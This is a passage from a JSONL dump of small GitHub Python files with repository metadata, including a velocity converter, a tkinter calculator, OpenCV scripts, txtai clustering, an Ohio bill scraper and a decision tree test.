[Velocity Unit] is given in [Kph] key: [k] or [K].\")\r\n return\r\n\r\ndef InstMens3():\r\n print(\"\\t+ If the [Velocity Unit] is given in [Mps] key: [m] or [M].\")\r\n return\r\n\r\ndef InstMens4():\r\n print(\"\\t+ If the [Velocity Unit] is given in [Fts] key: [f] or [F].\")\r\n return\r\n\r\ndef Resultado1():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Mph,\"<10.2f\"),\"Mph\")\r\n return\r\n\r\ndef Resultado2():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Kph,\"<10.2f\"),\"Kph\")\r\n return\r\n\r\ndef Resultado3():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Mps,\"<10.2f\"),\"Mps\")\r\n return\r\n\r\ndef Resultado4():\r\n print(\"\\n\\t* The [Velocity] is:\", format(Fts,\"<10.2f\"),\"fts\")\r\n return\r\n\r\ndef Unidade():\r\n u = input(\"\\n\\t<> Select a only [previous variable] of [Velocity Unit] given in problem? \")\r\n return u\r\n\r\ndef View():\r\n print(\"\\n\\n\\t\\t--[NONE OF THE OPTIONS PREVIOUS WAS USED!]--\")\r\n print(\"\\t-_- [ USE THE PROGRAM: ALGCONBUNVELOC.PY AGAIN -- OK! ]\\n\")\r\n return\r\n\r\ndef introduce():\r\n while True:\r\n try:\r\n def enterIntegerData():\r\n x = int(input('\\t(º>º) Provide the [new] value? '))\r\n return x\r\n coeffic = enterIntegerData()\r\n\r\n while coeffic <= 0:\r\n print('\\n\\t*[ NO TYPE AN [NEGATIVE INTEGER NUMBER] or equal [ZERO]--Ok! ]*\\n')\r\n coeffic = enterIntegerData()\r\n\r\n print('\\t **[The typed number]:',coeffic,'is a [valid float number!]**\\n')\r\n return coeffic\r\n except ValueError as err:\r\n print('\\t ###')\r\n print('\\t º>º [Warning!]:',err)\r\n print('\\t \\~/ [TYPE AN NEW POSITIVE INTEGER NUMBER IN NEXT INSTRUCTION -- OK!]\\n') \r\n\r\nnumber = introduce()\r\n\r\nif number == 1:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IS IN MILE PER HOUR(Mph)]--\\n\")\r\n InstMens2()\r\n InstMens3()\r\n InstMens4()\r\n unid = Unidade()\r\n if unid == 'k' or unid == 'K':\r\n Mph = Mile1()\r\n Solução = Resultado1()\r\n elif unid == 'm' or unid == 'M':\r\n Mph = Mile2()\r\n Solução = Resultado1()\r\n elif unid == 'f' or unid == 'F':\r\n Mph = Mile3()\r\n Solução = Resultado1()\r\n else:\r\n View()\r\n \r\nelif number == 2:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IN KILOMETER PER HOUR(Kph)]--\\n\")\r\n InstMens1()\r\n InstMens3()\r\n InstMens4()\r\n unid = Unidade()\r\n if unid == 'i' or unid == 'I':\r\n Kph = Kilometer1()\r\n Solução = Resultado2()\r\n elif unid == 'm' or unid == 'M':\r\n Kph = Kilometer2()\r\n Solução = Resultado2()\r\n elif unid == 'f' or unid == 'F':\r\n Kph = Kilometer3()\r\n Solução = Resultado2()\r\n else:\r\n View()\r\n\r\nelif number == 3:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IN METER PER SEGUNDO(Mps)]--\\n\")\r\n InstMens1()\r\n InstMens2()\r\n InstMens4()\r\n unid = Unidade()\r\n if unid == 'i' or unid == 'I':\r\n Mps = Meter1()\r\n Solução = Resultado3()\r\n elif unid == 'k' or unid == 'K':\r\n Mps = Meter2()\r\n Solução = Resultado3()\r\n elif unid == 'f' or unid == 'F':\r\n Mps = Meter3()\r\n Solução = Resultado3()\r\n else:\r\n View()\r\n\r\nelif number == 4:\r\n print(\"\\n\\n\\t\\t--[VELOCITY CALCULED IN FOOT PER SECOND(Fts)]--\\n\")\r\n InstMens1()\r\n InstMens2()\r\n InstMens3()\r\n unid = Unidade()\r\n if unid == 'i' or unid == 'I':\r\n Fts = Foot1()\r\n Solução = Resultado4()\r\n elif unid == 'k' or unid == 'K':\r\n Fts = Foot2()\r\n Solução = Resultado4()\r\n elif unid == 'm' or unid == 'M':\r\n Fts = Foot3()\r\n Solução = Resultado4()\r\n else:\r\n View()\r\nelse:\r\n View()\r\n\r\nprint(\"\\n\\n\\t\\t\\t ////\")\r\nprint(\"\\t\\t\\t º<º . . .[END PROGRAM -- OK!]. . .\")\r\nprint(\"\\t\\t\\t \\-/\")\r\n\r\ninput(\"\\n\\n\\t\\t. . .KEY [ENTER] TO EXIT OF THE PROGRAM!. . .\\n\")\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n","repo_name":"cristovomgirodo/Conversions-between-Velocitys","sub_path":"algconbunveloc.py","file_name":"algconbunveloc.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41593034391","text":"it = np.nditer(AA, flags=[\"multi_index\"], op_flags=[\"readwrite\"])\nwhile not it.finished :\n idx = it.multi_index\n print(AA[idx])\n it.iternext()\n\nlist2 = [n for n in range(10, 90, 10)] \nAA = np.array(list2)\nAA = A.reshape(2,4)\nDD = np.concatenate((AA, np.array([1,2,3,4]).reshape(1,4)), axis=0)\n\ndata = np.loadtxt(r\"C:\\images\\Etc_Raw\\sdf.csv\", delimiter=',', dtype=np.int32)","repo_name":"Roasters/ComputerVision","sub_path":"npTechniques.py","file_name":"npTechniques.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23571360681","text":"# your code goes here\r\nfrom sys import stdin\r\n\r\nt = int(stdin.readline().strip())\r\nfor iii in range(t):\r\n n,k = [int(x) for x in stdin.readline().strip().split() ]\r\n s = [1,n+2]\r\n for i in range(k):\r\n mmax,mmin,pos = -1,-1,-1\r\n for j in range(len(s)-1):\r\n if s[j]==s[j+1]+1: continue\r\n tpos = int((s[j]+s[j+1])/2)\r\n tmmax = max(abs(tpos-s[j]),abs(tpos-s[j+1]))\r\n tmmin = min(abs(tpos-s[j]),abs(tpos-s[j+1]))\r\n if tmmin>mmin:\r\n mmin=tmmin\r\n mmax=tmmax\r\n pos = tpos\r\n elif tmmin==mmin and tmmax>mmax:\r\n mmax=tmmax\r\n pos = tpos\r\n s.append(pos)\r\n s.sort()\r\n print('Case #{0}: {1} {2}'.format(iii+1,mmax-1,mmin-1))\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_201/2782.py","file_name":"2782.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4473033123","text":"from tkinter import *\nfrom tkinter import Tk\nfrom turtle import color\n\n# cores\n\ncor1 = \"#1e1f1e\" # preto\ncor2 = \"#ffffff\" # branco\ncor3 = \"#38576b\" # azul\ncor4 = \"#404040\" # cinza\ncor5 = \"#FFAB40\" # laranja\n\njanela = Tk()\njanela.title('Calculadora')\njanela.geometry(\"235x310\")\njanela.config(bg=cor1)\n\n# frames\nframe_tela = Frame(janela, width=235, height=50, bg=cor1)\nframe_tela.grid(row=0, column=0)\n\nframe_corpo = Frame(janela, width=235, height=268, bg=cor3)\nframe_corpo.grid(row=1, column=0)\n\n\n# variavel todos valores\n\ntodos_valores = ''\nvalor_texto = StringVar()\n\n#criando funcao\n\ndef digita_valor(event):\n \n global todos_valores\n \n todos_valores =todos_valores + str(event)\n\n #mostra o valor na tela\n \n valor_texto.set(todos_valores)\n\n# funcao para calcular\n\ndef calcular():\n global todos_valores\n resultado = eval(todos_valores)\n \n valor_texto.set(str(resultado))\n\n# funcao limpa tela\n\ndef limpar_tela():\n global todos_valores\n todos_valores = \"\"\n valor_texto.set(\"\")\n\n# criando label\n\napp_label = Label(frame_tela, textvariable=valor_texto, width=16, height=2, padx=7, relief=FLAT, anchor=\"e\", justify=RIGHT, font=('Ivy 18'), bg=cor1, fg=cor2)\napp_label.place(x=0,y=0)\n\n#botoes\n\nb_1 = Button(frame_corpo, command=limpar_tela, text=\"C\", width=11, height=2, bg=cor2, font=('Ivy 13 bold'), relief=GROOVE, overrelief=FLAT)\nb_1.place(x=0, y=0)\nb_2 = Button(frame_corpo, command= lambda: digita_valor('%'),text=\"%\", width=5, height=2, bg=cor2, font=('Ivy 13 bold'), relief=GROOVE, overrelief=FLAT)\nb_2.place(x=120, y=0)\nb_3 = Button(frame_corpo, command=lambda: digita_valor('/'), text=\"/\", width=5, height=2, bg=cor5, fg=cor2, font=('Ivy 13 bold'), relief=GROOVE, overrelief=FLAT)\nb_3.place(x=180, y=0)\n\nb_4 = Button(frame_corpo, command= lambda: digita_valor('7'), text=\"7\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_4.place(x=0, y=52)\nb_5 = Button(frame_corpo, command= lambda: digita_valor('8'), text=\"8\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_5.place(x=60, y=52)\nb_6 = Button(frame_corpo, command= lambda: digita_valor('9'), text=\"9\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_6.place(x=120, y=52)\nb_7 = Button(frame_corpo, command= lambda: digita_valor('*'), text=\"*\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_7.place(x=180, y=52)\n\nb_8 = Button(frame_corpo, command= lambda: digita_valor('4'), text=\"4\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_8.place(x=0, y=104)\nb_9 = Button(frame_corpo, command= lambda: digita_valor('5'),text=\"5\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_9.place(x=60, y=104)\nb_10 = Button(frame_corpo, command= lambda: digita_valor('6'),text=\"6\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_10.place(x=120, y=104)\nb_11 = Button(frame_corpo, command= lambda: digita_valor('-'), text=\"-\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_11.place(x=180, y=104)\n\nb_12 = Button(frame_corpo, command= lambda: digita_valor('1'), text=\"1\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_12.place(x=0, y=156)\nb_13 = Button(frame_corpo, command= lambda: digita_valor('2'), text=\"2\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_13.place(x=60, y=156)\nb_14 = Button(frame_corpo, command= lambda: digita_valor('3'), text=\"3\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_14.place(x=120, y=156)\nb_15 = Button(frame_corpo, command= lambda: digita_valor('+'), text=\"+\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_15.place(x=180, y=156)\n\nb_16 = Button(frame_corpo, command= lambda: digita_valor('0'), text=\"0\",width=11, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_16.place(x=0, y=208)\nb_17 = Button(frame_corpo, command= lambda: digita_valor('.'), text=\".\",width=5, height=2, bg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_17.place(x=120, y=208)\nb_18 = Button(frame_corpo, command= calcular, text=\"=\",width=5, height=2, bg=cor5, fg=cor2, font='Ivy 13 bold', relief=GROOVE, overrelief=FLAT)\nb_18.place(x=180, y=208)\n\n\njanela.mainloop()\n","repo_name":"Felipe-OLV/Projeto_1_Calculadora","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15663489613","text":"import cv2\n\n# 画像の読み込み\nimg = cv2.imread(\"6632749D-F045-4866-89A2-88EDF54477E5.jpeg\", 0)\n\n# 閾値の設定\nthreshold = 100\n\nret2, img_otsu = cv2.threshold(img, 0, 255, cv2.THRESH_OTSU)\n\n#閾値がいくつになったか確認\nprint(\"ret2: {}\".format(ret2))\n\n#画像の確認\n#cv2.imshow(\"otsu\", img_otsu)\n#cv2.waitKey()\n#cv2.destroyAllWindows()\n\ncv2.imwrite('opencv_2_cvtcolr.jpg', img_otsu)","repo_name":"2022AIT-OOP2-G05/web-image-processing-11","sub_path":"2chika/2chika.py","file_name":"2chika.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"ja","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37633505154","text":"#import libraries \r\nfrom txtai.embeddings import Embeddings\r\nimport json\r\nimport pandas as pd\r\n\r\n#import prelearned ai\r\nembeddings = Embeddings({\r\n \r\n \"path\": \"sentence-transformers/all-MiniLM-L6-v2\"\r\n})\r\n\r\n#load data into dataframe\r\nwith open(\"data.json\", \"r\") as f:\r\n json_data = json.load(f)\r\n data = pd.DataFrame(json_data)\r\n\r\n#filter out duplicates\r\ndata.drop_duplicates(subset = 'FAULT_ID', inplace = True, keep = \"first\")\r\n#reset indexes to not break the range functions later on\r\ndata.reset_index(drop = True, inplace = True)\r\n\r\n#Have ai index all text\r\ntxtai_data = []\r\nfor text, row in data.iterrows():\r\n txtai_data.append((text, row['FAULT_LINE_TEXT'], None))\r\nembeddings.index(txtai_data)\r\n\r\ndef ULists():\r\n #Create List of all clusters with size 1\r\n UList1 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n #Similarity of 0.5 or more\r\n if r[1] > 0.5:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList1.append(list)\r\n\r\n UList2 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.6:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList2.append(list)\r\n\r\n UList3 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.7:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList3.append(list)\r\n\r\n UList4 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.8:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList4.append(list)\r\n\r\n UList5 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.9:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) == 1:\r\n UList5.append(list)\r\n \r\n#Printing Lists for now \r\n print(UList1)\r\n print(UList2)\r\n print(UList3)\r\n print(UList4)\r\n print(UList5)\r\n\r\ndef GLists():\r\n #Find Generalized Lists \r\n GList1 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n #Similarity of 0.5 or more\r\n if r[1] > 0.5:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n #Only add to GList if length is greater than 1\r\n if len(list) > 1:\r\n GList1.append(list)\r\n\r\n GList2 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.6:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList2.append(list)\r\n\r\n GList3 = []\r\n for i in range(0,500):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.7:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList3.append(list)\r\n\r\n GList4 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.8:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList4.append(list)\r\n\r\n GList5 = []\r\n for i in range(0,100):\r\n res = embeddings.search(data[\"FAULT_LINE_TEXT\"][i], 20)\r\n list= []\r\n for r in res:\r\n if r[1] > 0.9:\r\n list.append(data[\"FAULT_ID\"][r[0]])\r\n if len(list) > 1:\r\n GList5.append(list)\r\n\r\n#Printing Lists for now\r\n #return(GList1)\r\n #return(GList2)\r\n print(GList3)\r\n #return(GList4)\r\n #return(GList5)\r\n\r\n#Call Functions wanted to run\r\n\r\ndef mech(GList):\r\n gen = []\r\n print(GList)\r\n for i in range(len(GList)):\r\n for j in range(len(GList)):\r\n if GList[i] != GList[j]:\r\n com = [item for item in GList[i] if item in GList[j]]\r\n if com:\r\n gen.append(com)\r\n print(gen)\r\n\r\nGLists()\r\n","repo_name":"Luquintero24/Lockheed-Project","sub_path":"testai.py","file_name":"testai.py","file_ext":"py","file_size_in_byte":4534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22526303629","text":"#!/usr/bin/env python\n\nimport sys\n\ncontig = \"NC_045512.2\"\ncoverage_data = {}\n\nfor filename in sys.argv[1:]:\n sample = filename.split('/')[0]\n coverage_data[sample] = [-1 for cov in range(29904)]\n\n with open(filename, \"r\") as sample_coverage:\n for read_depth_data in sample_coverage.readlines():\n read = read_depth_data.split(\"\\t\")\n\n position = int(read[1]) - 1\n coverage = int(read[2])\n\n coverage_data[sample][position] = coverage\n\nsamples = sorted(coverage_data.keys())\n\nwith open(\"coverage.tsv\", \"w+\") as coverage:\n coverage.write(\"contig\\tposition\")\n for sample in samples:\n coverage.write(\"\\t\" + sample)\n coverage.write(\"\\n\")\n\n for position in range(29903):\n coverage.write(contig + \"\\t\" + str(position + 1))\n for sample in samples:\n coverage.write(\"\\t\" + str(coverage_data[sample][position]))\n coverage.write(\"\\n\")","repo_name":"michaeljon/pipeline-builder","sub_path":"tools/joiner.py","file_name":"joiner.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29838014207","text":"from __future__ import with_statement\nimport urlparse\nimport datetime as dt\nfrom fiftystates.scrape.oh import metadata\nfrom fiftystates.scrape.oh.utils import chamber_name, parse_ftp_listing\nfrom fiftystates.scrape.bills import BillScraper, Bill\nfrom fiftystates.scrape.votes import VoteScraper, Vote\nfrom datetime import datetime\nimport xlrd\nimport urllib\nimport lxml.etree\n\n\nclass OHBillScraper(BillScraper):\n state = 'oh'\n def scrape(self, chamber, session):\n\n if int(session) < 128:\n raise NoDataForPeriod(year)\n\n if chamber == 'upper':\n self.scrape_house_bills(session)\n elif chamber == 'lower':\n self.scrape_senate_bills(session)\n\n def scrape_house_bills(self, session):\n\n house_bills_url = 'http://www.lsc.state.oh.us/status%s/hb.xls' % session\n house_jointres_url = 'http://www.lsc.state.oh.us/status%s/hjr.xls' % session\n house_concurres_url = 'http://www.lsc.state.oh.us/status%s/hcr.xls' % session\n files = (house_bills_url, house_jointres_url, house_concurres_url)\n\n for house_file in files:\n\n house_bills_file = urllib.urlopen(house_file).read()\n f = open('oh_bills.xls','w')\n f.write(house_bills_file)\n f.close()\n \n \n wb = xlrd.open_workbook('oh_bills.xls')\n sh = wb.sheet_by_index(0)\n \n house_file = str(house_file)\n if len(str(house_file)) == 44:\n file_type = house_file[len(house_file) - 7:len(house_file)-4]\n else:\n file_type = house_file[len(house_file) - 6:len(house_file)-4]\n\n for rownum in range(1, sh.nrows):\n \n bill_id = file_type + str(int(rownum))\n bill_title = str(sh.cell(rownum, 3).value) \n bill = Bill( session, 'upper', bill_id, bill_title)\n bill.add_sponsor( 'primary', str(sh.cell(rownum, 1).value) )\n\n if sh.cell(rownum, 2).value is not '':\n bill.add_sponsor( 'cosponsor', str(sh.cell(rownum, 2).value) )\n\n actor = \"\"\n\n #Actions - starts column after bill title\n for colnum in range( 4, sh.ncols - 1):\n \n coltitle = str(sh.cell(0, colnum).value)\n cell = sh.cell(rownum, colnum) \n\n if len(coltitle) != 0:\n\n if coltitle.split()[0] == 'House':\n actor = \"upper\"\n elif coltitle.split()[0] == 'Senate':\n actor = \"lower\"\n elif coltitle.split()[-1] == 'Governor':\n actor = \"Governor\"\n else:\n actor = actor\n \n action = str(sh.cell( 0, colnum).value)\n date = cell.value\n \n if type(cell.value) == float:\n date = str(xlrd.xldate_as_tuple(date, 0))\n date = datetime.strptime(date, \"(%Y, %m, %d, %H, %M, %S)\")\n bill.add_action(actor, action, date) \n\n bill.add_source(house_file)\n self.scrape_votes(bill, file_type, rownum, session)\n\n self.save_bill(bill)\n\n\n def scrape_senate_bills(self, session):\n\n senate_bills_url = 'http://www.lsc.state.oh.us/status%s/sb.xls' % session\n senate_jointres_url = 'http://www.lsc.state.oh.us/status%s/sjr.xls' % session\n senate_concurres_url = 'http://www.lsc.state.oh.us/status%s/scr.xls' % session\n files = [senate_bills_url, senate_jointres_url, senate_concurres_url]\n\n for senate_file in files:\n\n senate_bills_file = urllib.urlopen(senate_file).read()\n f = open('oh_bills.xls','w')\n f.write(senate_bills_file)\n f.close()\n\n wb = xlrd.open_workbook('oh_bills.xls')\n sh = wb.sheet_by_index(0)\n\n senate_file = str(senate_file)\n if len(str(senate_file)) == 44:\n file_type = senate_file[len(senate_file) - 7:len(senate_file)-4]\n else:\n file_type = senate_file[len(senate_file) - 6:len(senate_file)-4]\n\n for rownum in range(1, sh.nrows):\n\n bill_id = file_type + str(int(rownum))\n bill_title = str(sh.cell(rownum, 3).value)\n bill = Bill( session, 'lower', bill_id, bill_title)\n bill.add_sponsor( 'primary', str(sh.cell(rownum, 1).value) )\n\n if sh.cell(rownum, 2).value is not '':\n bill.add_sponsor( 'cosponsor', str(sh.cell(rownum, 2).value) )\n\n actor = \"\"\n\n #Actions - starts column after bill title\n for colnum in range( 4, sh.ncols - 1):\n\n coltitle = str(sh.cell(0, colnum).value)\n cell = sh.cell(rownum, colnum)\n\n if len(coltitle) != 0:\n\n if coltitle.split()[0] == 'House':\n actor = \"upper\"\n elif coltitle.split()[0] == 'Senate':\n actor = \"lower\"\n elif coltitle.split()[0] == 'Gov.':\n actor = \"Governor\"\n elif coltitle.split()[-1] == 'Gov.':\n actor = \"Governor\"\n elif coltitle.split()[-1] == 'Governor':\n actor = \"Governor\"\n else:\n actor = actor\n\n action = str(sh.cell( 0, colnum).value)\n date = cell.value\n\n if type(cell.value) == float:\n date = str(xlrd.xldate_as_tuple(date, 0))\n date = datetime.strptime(date, \"(%Y, %m, %d, %H, %M, %S)\")\n bill.add_action(actor, action, date)\n\n bill.add_source(senate_file)\n self.scrape_votes(bill, file_type, rownum, session)\n\n self.save_bill(bill)\n\n def scrape_votes(self, bill, file_type, number, session):\n vote_url = 'http://www.legislature.state.oh.us/votes.cfm?ID=' + session + '_' + file_type + '_' + str(number)\n with self.urlopen(vote_url) as page:\n root = lxml.etree.fromstring(page, lxml.etree.HTMLParser())\n \n save_date = None\n for el in root.xpath('/html/body/table/tr[3]/td/table/tr[1]/td[2][@class=\"bigPanel\"]/blockquote/font/table'):\n for mr in root.xpath('/html/body/table/tr[3]/td/table/tr[1]/td[2][@class=\"bigPanel\"]/blockquote/font/table/tr[position() > 1]'):\n \n yes_count = 0\n yes_placement = 0\n no_count = 0\n no_placement = 0 \n\n date = mr.xpath('string(td/font/a)')\n date = date.lstrip()\n date = date.rstrip()\n info = mr.xpath('string(td[2]/font)') \n\n #makes sure that date is saved \n if len(date.split()) > 0:\n date = datetime.strptime(date, \"%m/%d/%Y\")\n save_date = date\n\n #figures out the number of votes for each way\n #also figures out placement of yes and no voters starts for later iteration\n if info.split()[0] == 'Yeas':\n \n #yes votes\n yes_count = info.split()[2]\n\n #no votes\n for voter in range(3, len(info.split())):\n if info.split()[voter] == '-':\n no_count = info.split()[voter + 1]\n no_placement = voter + 2\n yes_placement = voter - 2\n \n #motion and chamber\n if info.split()[-1] == 'details':\n motion = info[0:len(info)-10]\n motion = motion.lstrip()\n motion = motion.rstrip()\n chamber = motion.split()[0]\n \n if chamber == \"Senate\":\n chamber = \"upper\"\n else:\n chamber = \"lower\"\n\n #pass or not (only by which has more. need to see look up how they are passed)\n if yes_count > no_count:\n passed = True\n else:\n passed = False\n\n vote = Vote(chamber, save_date, motion, passed, int(yes_count), int(no_count), other_count = 0)\n\n #adding in yea voters\n for voters in range(3, yes_placement):\n legis = \"\"\n initials = 0 \n\n #checks to see if the next name is actually an initial\n if len(info.split()[voters+1]) < 2:\n legis = legis + info.split()[voters] + \" \" + info.split()[voters + 1]\n elif len(info.split()[voters]) < 2:\n initials = 1\n else:\n legis = legis + info.split()[voters]\n \n if initials < 1:\n vote.yes(legis)\n \n #adding in no voters\n for voters in range(no_placement, len(info.split())):\n legis = \"\" \n initials = 0\n\n #checks to see if the next name is actually an initial\n if (info.split()[voters] != info.split()[-1]) and (len(info.split()[voters+1]) < 2):\n legis = legis + info.split()[voters] + \" \" + info.split()[voters + 1]\n elif len(info.split()[voters]) < 2:\n initals = 1\n else:\n legis = legis + info.split()[voters]\n\n if initials < 1:\n vote.no(legis)\n \n #gets rid of blank votes\n if yes_count > 0 or no_count > 0:\n vote.add_source(vote_url)\n bill.add_vote(vote) \n","repo_name":"runderwood/fiftystates","sub_path":"fiftystates/scrape/oh/bills.py","file_name":"bills.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"23826213851","text":"# dwarfs = {}\n# while True:\n# command = input()\n# if command == \"Once upon a time\":\n# break\n# name, color, physics = command.split(' <:> ')\n# if (name, color) not in dwarfs.keys():\n# dwarfs[(name, color)] = int(physics)\n# else:\n# if dwarfs[(name, color)] < int(physics):\n# dwarfs[(name, color)] = int(physics)\n#\n# sorted_by_physics = dict(sorted(dwarfs.items(), key=lambda x: (x[1], x[0][1]), reverse=True))\n# sorted__by_hat_color = dict(sorted(sorted_by_physics.items(), key=lambda x: x[0][1], reverse=True))\n#\n# for key, value in sorted_by_physics.items():\n# print(f\"({key[1]}) {key[0]} <-> {value}\")\n\ndwarfs = {}\nwhile True:\n command = input()\n if command == \"Once upon a time\":\n break\n name, color, physics = command.split(' <:> ')\n if color not in dwarfs.keys():\n dwarfs[color] = [[int(physics), name]]\n else:\n name_exists = False\n for value in dwarfs[color]:\n if name in value:\n name_exists = True\n if int(value[0]) < int(physics):\n value[0] = int(physics)\n break\n if name_exists == False:\n dwarfs[color] += [[int(physics), name]]\nsorted_dwarfs_by_color_occurrence = dict(sorted(dwarfs.items(), key=lambda x: len(x[1]), reverse=True))\nnew_list = []\nfor key in sorted_dwarfs_by_color_occurrence.keys():\n for value in sorted_dwarfs_by_color_occurrence[key]:\n new_list.append((value[1], key, value[0]))\nsorted_result = sorted(new_list, key=lambda x: x[2], reverse=True)\nfor list in sorted_result:\n print(f\"({list[1]}) {list[0]} <-> {list[2]}\")\n\n\n\n\n","repo_name":"teodoraNI/Python_Fundamentals","sub_path":"Dictionaries/More_exercises/snow_white.py","file_name":"snow_white.py","file_ext":"py","file_size_in_byte":1664,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70842853635","text":"# for Face Detection we need to convert the image into gray scale as face detection does not depend on the color or skin tone, but depends only on the edges of the face\r\nimport cv2 as cv\r\nimport numpy as np\r\nimg=cv.imread('openCV\\pic\\Aswin.jpeg')\r\ncv.imshow('Aswin',img)\r\ngray=cv.cvtColor(img,cv.COLOR_BGR2GRAY)\r\ncv.imshow('Gray',gray)\r\nhaar_cascade=cv.CascadeClassifier('Haar_face.xml') # tpe the folder name in which the classifier is stored within the quatation marks\r\nfaces_rect = haar_cascade.detectMultiScale(gray,scaleFactor=1.1,minNeighbors=3)\r\nprint(f'Number of faces={len(faces_rect)}')\r\nfor(x,y,w,h) in faces_rect:\r\n cv.rectangle(img,(x,y),(x+w,y+h),(0,255,0),thickness=2)\r\ncv.imshow('Detected Faces',img)\r\n\r\n\r\n\r\ncv.waitKey(0)","repo_name":"ASWINSEKHAR/OPENCV_WORKS","sub_path":"Face_detec.py","file_name":"Face_detec.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"7167520103","text":"from application import db\n\nfrom .base import KeyedBase\n\n\nclass AnonymousUser:\n is_authenticated = False\n\n\nclass User(KeyedBase, db.AlchemyBase):\n __tablename__ = 'users'\n\n firebase_uid = db.Column(db.String(128), unique=True)\n\n @property\n def is_authenticated(self):\n return True\n","repo_name":"onecrayon/redspoon","sub_path":"application/models/users.py","file_name":"users.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"37719652342","text":"from DecisionTree import Id3\nfrom Data.car import CarData\nimport os\n\n\ndef non_numeric_id3_test():\n # Construct datasets\n dir_path = os.path.dirname(os.path.realpath(__file__))\n\n data = CarData.Data()\n data.initialize_data_from_file(dir_path + '/../../Data/car/train.csv')\n\n metrics = {0: 'information_gain', 1: 'majority_error_gain', 2: 'gini_index_gain'}\n\n # 